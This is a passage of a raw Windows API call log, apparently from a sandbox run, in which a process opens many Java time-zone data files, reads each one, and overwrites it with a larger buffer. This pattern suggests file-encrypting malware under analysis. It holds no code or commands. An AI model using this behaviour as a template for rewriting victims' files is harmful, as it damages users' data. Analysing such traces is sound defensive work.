lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.477] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4c8 [0131.477] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.477] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.477] ReleaseMutex (hMutex=0x168) returned 1 [0131.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Juneau", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0131.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Juneau", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Juneau", lpUsedDefaultChar=0x0) returned 6 [0131.478] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x311f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0131.914] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0131.914] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x311f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0131.914] CloseHandle (hObject=0x1f0) returned 1 [0131.929] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.350] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.351] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x139 [0133.351] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.351] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.351] ReleaseMutex (hMutex=0x168) returned 1 [0133.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Manaus", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0133.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Manaus", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Manaus", lpUsedDefaultChar=0x0) returned 6 [0133.351] ReadFile (in: hFile=0x204, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x139, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x311f2bc*=0x139, lpOverlapped=0x0) returned 1 [0133.352] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.353] WriteFile (in: hFile=0x204, lpBuffer=0x1e943c8*, nNumberOfBytesToWrite=0x6c1, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesWritten=0x311f2d0*=0x6c1, lpOverlapped=0x0) returned 1 [0133.353] CloseHandle (hObject=0x204) returned 1 [0133.353] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.355] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.355] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3a0 [0133.355] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.355] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.355] ReleaseMutex (hMutex=0x168) returned 1 [0133.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Miquelon", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0133.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Miquelon", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Miquelon", lpUsedDefaultChar=0x0) returned 8 [0133.355] ReadFile (in: hFile=0x204, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x3a0, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x311f2bc*=0x3a0, lpOverlapped=0x0) returned 1 [0133.358] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.358] WriteFile (in: hFile=0x204, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x928, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x311f2d0*=0x928, lpOverlapped=0x0) returned 1 [0133.358] CloseHandle (hObject=0x204) returned 1 [0133.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.360] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.360] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x478 [0133.360] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.360] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.360] ReleaseMutex (hMutex=0x168) returned 1 [0133.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nipigon", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0133.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nipigon", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nipigon", lpUsedDefaultChar=0x0) returned 7 [0133.361] ReadFile (in: hFile=0x204, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x478, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x311f2bc*=0x478, lpOverlapped=0x0) returned 1 [0133.362] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.363] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0xa00, lpOverlapped=0x0) returned 1 [0133.363] CloseHandle (hObject=0x204) returned 1 [0133.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.365] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.365] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x434 [0133.365] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.365] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.365] ReleaseMutex (hMutex=0x168) returned 1 [0133.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pangnirtung", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0133.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pangnirtung", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pangnirtung", lpUsedDefaultChar=0x0) returned 11 [0133.365] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x434, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x434, lpOverlapped=0x0) returned 1 [0133.368] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.368] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9bc, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9bc, lpOverlapped=0x0) returned 1 [0133.368] CloseHandle (hObject=0x204) returned 1 [0133.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.370] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.370] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41c [0133.370] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.370] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.370] ReleaseMutex (hMutex=0x168) returned 1 [0133.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rankin_Inlet", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0133.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rankin_Inlet", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rankin_Inlet", lpUsedDefaultChar=0x0) returned 12 [0133.371] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x41c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x41c, lpOverlapped=0x0) returned 1 [0133.373] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.373] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9a4, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9a4, lpOverlapped=0x0) returned 1 [0133.373] CloseHandle (hObject=0x204) returned 1 [0133.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.374] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.374] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc9 [0133.374] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.374] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.374] ReleaseMutex (hMutex=0x168) returned 1 [0133.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santo_Domingo", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0133.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santo_Domingo", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Santo_Domingo", lpUsedDefaultChar=0x0) returned 13 [0133.374] ReadFile (in: hFile=0x204, lpBuffer=0x1ed5ff8, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5ff8*, lpNumberOfBytesRead=0x311f2bc*=0xc9, lpOverlapped=0x0) returned 1 [0133.375] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.376] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x651, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x651, lpOverlapped=0x0) returned 1 [0133.376] CloseHandle (hObject=0x204) returned 1 [0133.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_vincent"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.377] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.377] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0133.377] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.377] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.377] ReleaseMutex (hMutex=0x168) returned 1 [0133.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Vincent", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0133.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Vincent", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="St_Vincent", lpUsedDefaultChar=0x0) returned 10 [0133.377] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0133.379] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.379] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0133.379] CloseHandle (hObject=0x204) returned 1 [0133.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.380] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.381] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x638 [0133.381] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.381] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.381] ReleaseMutex (hMutex=0x168) returned 1 [0133.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vancouver", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0133.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vancouver", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vancouver", lpUsedDefaultChar=0x0) returned 9 [0133.381] ReadFile (in: hFile=0x204, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x638, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x311f2bc*=0x638, lpOverlapped=0x0) returned 1 [0133.383] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0133.383] WriteFile (in: hFile=0x204, lpBuffer=0x28741b8*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28741b8*, lpNumberOfBytesWritten=0x311f2d0*=0xbc0, lpOverlapped=0x0) returned 1 [0133.383] CloseHandle (hObject=0x204) returned 1 [0133.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0133.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x311 [0133.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0133.385] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.385] ReleaseMutex (hMutex=0x168) returned 1 [0133.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Macquarie", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0133.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Macquarie", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Macquarie", lpUsedDefaultChar=0x0) returned 9 [0133.385] ReadFile (in: hFile=0x204, lpBuffer=0x28721a8, nNumberOfBytesToRead=0x311, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28721a8*, lpNumberOfBytesRead=0x311f2bc*=0x311, lpOverlapped=0x0) returned 1 [0135.893] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0135.894] WriteFile (in: hFile=0x204, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x899, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x899, lpOverlapped=0x0) returned 1 [0135.894] CloseHandle (hObject=0x204) returned 1 [0135.895] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0135.897] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0135.898] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1c5 [0135.898] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0135.898] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.898] ReleaseMutex (hMutex=0x168) returned 1 [0135.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Almaty", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0135.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Almaty", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Almaty", lpUsedDefaultChar=0x0) returned 6 [0135.898] ReadFile (in: hFile=0x204, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1c5, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x311f2bc*=0x1c5, lpOverlapped=0x0) returned 1 [0135.900] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0135.900] WriteFile (in: hFile=0x204, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x74d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x74d, lpOverlapped=0x0) returned 1 [0135.900] CloseHandle (hObject=0x204) returned 1 [0135.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0135.979] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0135.979] SetFilePointer (in: hFile=0x1d4, 